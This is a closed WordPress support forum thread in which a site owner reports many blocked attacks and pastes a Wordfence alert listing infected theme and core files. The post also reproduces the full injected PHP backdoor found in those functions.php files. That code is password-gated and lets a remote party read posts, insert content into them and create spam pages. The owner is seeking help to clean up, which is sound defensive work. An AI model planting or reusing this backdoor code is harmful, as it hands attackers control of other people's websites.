Attacks Blocked
-
HELLO WORDFENCE
First of all Thank you so much for the service you provide.I’ve currently got about 5 websites with WORDFENCE in my portfolio and generally speaking I get about 1-10 attacks a week blocked.
Recently I installed WORDFENCE on a new website hsnf.co.uk and I’m amazed to be seeing around +150 attacks daily.
Should I be worried about this and are there any steps to be taken to see why this is the case?
Also about a week ago, I received an email for my other domain but because I’m on a shared host all my domains are in one place and actually each domain was affected with the scripts below. I managed to delete the infected files and restore them to its original condition.
I’m unaware how that script managed to creep in. I haven’t seen anything suspicious until now where one of my new domains is getting 150+ attacks daily.Is deleting the files enough? Since its been a week should I safely assume that the problem won’t return?
This email was sent from your website "PIPKIN" by the Wordfence plugin. Wordfence found the following new issues on "PIPKIN". Alert generated at Saturday 1st of April 2017 at 01:04:25 AM Critical Problems: * WordPress core file modified: wp-includes/post.php * File appears to be malicious: wp-content/themes/twentyfifteen/functions.php * File appears to be malicious: wp-content/themes/twentyseventeen/functions.php * File appears to be malicious: wp-content/themes/twentysixteen/functions.php * File appears to be malicious: wp-content/themes/wr-nitro/functions.php * File appears to be malicious: wp-content/themes/wr-nitro-child/functions.php * File appears to be malicious: wp-includes/post.php Warnings: * Modified theme file: wp-content/themes/twentyfifteen/functions.php * Modified theme file: wp-content/themes/twentysixteen/functions.php * Unknown file in WordPress core: wp-includes/class.wp.php * Unknown file in WordPress core: wp-includes/wp-cd.php<code></code><?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'fc5e5747f2235a4b772ced6265e750c5')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n"; } break; case 'set_id_links'; if (isset($_REQUEST['data'])) { $data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"'); $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content); if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>'; if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) { print "true"; } } break; case 'create_page'; if (isset($_REQUEST['remove_page'])) { if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"')) { print "true"; } } elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content'])) { if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"')) { print "true"; } } break; default: print "ERROR_WP_ACTION WP_URL_CD"; } die(""); } if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) { $data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"'); if ($data -> full_content) { print stripslashes($data -> content); } else { print '<!DOCTYPE html>'; print '<html '; language_attributes(); print ' class="no-js">'; print '<head>'; print '<title>'.stripslashes($data -> title).'</title>'; print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />'; print '<meta name="Description" content="'.stripslashes($data -> description).'" />'; print '<meta name="robots" content="index, follow" />'; print '<meta charset="'; bloginfo( 'charset' ); print '" />'; print '<meta name="viewport" content="width=device-width">'; print '<link rel="profile" href="http://gmpg.org/xfn/11">'; print '<link rel="pingback" href="'; bloginfo( 'pingback_url' ); print '">'; wp_head(); print '</head>'; print '<body>'; print '<div id="content" class="site-content">'; print stripslashes($data -> content); get_search_form(); get_sidebar(); get_footer(); } exit; } ?>
Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
The topic ‘Attacks Blocked’ is closed to new replies.
